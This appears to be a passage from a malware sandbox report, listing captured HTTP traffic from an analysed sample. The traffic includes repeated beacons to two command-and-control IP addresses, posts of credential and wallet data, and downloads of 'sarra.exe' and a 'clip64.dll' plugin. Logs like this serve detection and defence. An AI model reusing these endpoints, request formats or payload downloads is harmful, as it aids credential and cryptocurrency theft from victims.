Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 41 35 46 33 45 46 32 45 31 34 32 32 41 37 34 36 35 41 41 46 43 34 31 30 41 41 46 43 39 46 41 39 37 46 42 42 44 44 37 43 39 32 45 44 32 30 46 44 45 34 46 30 31 37 33 30 35 30 33 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA6135A5F3EF2E1422A7465AAFC410AAFC9FA97FBBDD7C92ED20FDE4F01730503
Source: global traffic HTTP traffic detected: GET /cost/sarra.exe HTTP/1.1Host: 193.233.132.167
Source: global traffic HTTP traffic detected: GET /enigma/Plugins/clip64.dll HTTP/1.1Host: 193.233.132.167
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 41 35 46 33 45 46 32 45 31 34 32 32 41 37 34 36 35 41 41 46 43 34 31 30 41 41 46 43 39 46 41 39 37 46 42 42 44 44 37 43 39 32 45 44 32 30 46 44 45 34 46 30 31 37 33 30 35 30 33 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA6135A5F3EF2E1422A7465AAFC410AAFC9FA97FBBDD7C92ED20FDE4F01730503
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 41 35 46 33 45 46 32 45 31 34 32 32 41 37 34 36 35 41 41 46 43 34 31 30 41 41 46 43 39 46 41 39 37 46 42 42 44 44 37 43 39 32 45 44 32 30 46 44 45 34 46 30 31 37 33 30 35 30 33 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA6135A5F3EF2E1422A7465AAFC410AAFC9FA97FBBDD7C92ED20FDE4F01730503
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 5Cache-Control: no-cacheData Raw: 77 6c 74 3d 31 Data Ascii: wlt=1
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 21Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 63 72 65 64 3d Data Ascii: id=246122658369&cred=
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 41 35 46 33 45 46 32 45 31 34 32 32 41 37 34 36 35 41 41 46 43 34 31 30 41 41 46 43 39 46 41 39 37 46 42 42 44 44 37 43 39 32 45 44 32 30 46 44 45 34 46 30 31 37 33 30 35 30 33 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA6135A5F3EF2E1422A7465AAFC410AAFC9FA97FBBDD7C92ED20FDE4F01730503
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 41 35 46 33 45 46 32 45 31 34 32 32 41 37 34 36 35 41 41 46 43 34 31 30 41 41 46 43 39 46 41 39 37 46 42 42 44 44 37 43 39 32 45 44 32 30 46 44 45 34 46 30 31 37 33 30 35 30 33 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA6135A5F3EF2E1422A7465AAFC410AAFC9FA97FBBDD7C92ED20FDE4F01730503
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php?wal=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----NjE0NQ==Host: 193.233.132.56Content-Length: 6305Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 41 35 46 33 45 46 32 45 31 34 32 32 41 37 34 36 35 41 41 46 43 34 31 30 41 41 46 43 39 46 41 39 37 46 42 42 44 44 37 43 39 32 45 44 32 30 46 44 45 34 46 30 31 37 33 30 35 30 33 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA6135A5F3EF2E1422A7465AAFC410AAFC9FA97FBBDD7C92ED20FDE4F01730503
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 41 35 46 33 45 46 32 45 31 34 32 32 41 37 34 36 35 41 41 46 43 34 31 30 41 41 46 43 39 46 41 39 37 46 42 42 44 44 37 43 39 32 45 44 32 30 46 44 45 34 46 30 31 37 33 30 35 30 33 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA6135A5F3EF2E1422A7465AAFC410AAFC9FA97FBBDD7C92ED20FDE4F01730503
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 35 37 30 33 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000057031&unit=246122658369
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 41 35 46 33 45 46 32 45 31 34 32 32 41 37 34 36 35 41 41 46 43 34 31 30 41 41 46 43 39 46 41 39 37 46 42 42 44 44 37 43 39 32 45 44 32 30 46 44 45 34 46 30 31 37 33 30 35 30 33 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA6135A5F3EF2E1422A7465AAFC410AAFC9FA97FBBDD7C92ED20FDE4F01730503
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 41 35 46 33 45 46 32 45 31 34 32 32 41 37 34 36 35 41 41 46 43 34 31 30 41 41 46 43 39 46 41 39 37 46 42 42 44 44 37 43 39 32 45 44 32 30 46 44 45 34 46 30 31 37 33 30 35 30 33 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA6135A5F3EF2E1422A7465AAFC410AAFC9FA97FBBDD7C92ED20FDE4F01730503
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 41 35 46 33 45 46 32 45 31 34 32 32 41 37 34 36 35 41 41 46 43 34 31 30 41 41 46 43 39 46 41 39 37 46 42 42 44 44 37 43 39 32 45 44 32 30 46 44 45 34 46 30 31 37 33 30 35 30 33 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA6135A5F3EF2E1422A7465AAFC410AAFC9FA97FBBDD7C92ED20FDE4F01730503
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 41 35 46 33 45 46 32 45 31 34 32 32 41 37 34 36 35 41 41 46 43 34 31 30 41 41 46 43 39 46 41 39 37 46 42 42 44 44 37 43 39 32 45 44 32 30 46 44 45 34 46 30 31 37 33 30 35 30 33 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA6135A5F3EF2E1422A7465AAFC410AAFC9FA97FBBDD7C92ED20FDE4F01730503
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 41 35 46 33 45 46 32 45 31 34 32 32 41 37 34 36 35 41 41 46 43 34 31 30 41 41 46 43 39 46 41 39 37 46 42 42 44 44 37 43 39 32 45 44 32 30 46 44 45 34 46 30 31 37 33 30 35 30 33 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA6135A5F3EF2E1422A7465AAFC410AAFC9FA97FBBDD7C92ED20FDE4F01730503
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 41 35 46 33 45 46 32 45 31 34 32 32 41 37 34 36 35 41 41 46 43 34 31 30 41 41 46 43 39 46 41 39 37 46 42 42 44 44 37 43 39 32 45 44 32 30 46 44 45 34 46 30 31 37 33 30 35 30 33 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA6135A5F3EF2E1422A7465AAFC410AAFC9FA97FBBDD7C92ED20FDE4F01730503
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 41 35 46 33 45 46 32 45 31 34 32 32 41 37 34 36 35 41 41 46 43 34 31 30 41 41 46 43 39 46 41 39 37 46 42 42 44 44 37 43 39 32 45 44 32 30 46 44 45 34 46 30 31 37 33 30 35 30 33 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA6135A5F3EF2E1422A7465AAFC410AAFC9FA97FBBDD7C92ED20FDE4F01730503
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
